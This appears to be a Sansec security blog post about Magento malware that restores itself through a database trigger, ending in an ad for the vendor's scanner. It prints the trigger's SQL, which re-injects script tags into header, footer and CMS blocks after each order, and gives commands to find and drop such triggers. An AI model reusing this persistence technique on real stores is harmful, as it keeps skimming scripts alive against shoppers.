Get started in 5 minutes!

Self-healing malware restores itself after deletion


Regular Javascript-based malware is normally injected in the static header or footer HTML definitions in the database. Cleaning these records used to be sufficient to get rid of the malware. But not anymore: this week a new malware pattern surfaced. Once deleted, it uses a clever database trigger to restore itself.

The pattern was discovered by Jeroen Boersma (excellent detective job!). He found the following database trigger (edited for readability):

TRIGGER `after_insert_order` 
AFTER INSERT ON `sales_flat_order` FOR EACH ROW
	UPDATE core_config_data 
	SET value = IF(
		value LIKE '%<script src=""></script>%', 
		CONCAT(value, ' <script src=""></script>')
	WHERE path='design/head/includes' 
		OR path='design/footer/absolute_footer' 
		OR path='design/footer/copyright';\

	UPDATE cms_block 
	SET content= IF(
		content LIKE '%<script src=""></script>%', 
		CONCAT(content, ' <script src=""></script>')

The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.

This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.

Check your own database

Do you have persistent malware hidden in your database?

echo 'SHOW TRIGGERS' | n98-magerun db:console

NB. Magento Enterprise and some community extensions contain legitimate triggers. So if you find triggers, look for suspicious SQL code, such as anything containing admin, .js, script or < (html tags).

If you find a malicious trigger, you can delete it like this:

echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console

Attack context

For future reference: the entry vector for this malware was a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop.

New signatures

Our Malware Scanner has been updated with the new patterns.

Hackers get smarter every day.
Outsmart them with eComscan.

eComscan is the automated backend security scanner that keeps your online store safe from attackers. Discover vulnerabilities and malicious activity instantly.
Sansec experts study dozens of hacks every day to keep you protected. Sansec is the only company specializing in Magento security and is a proud Adobe partner.

Scan your store now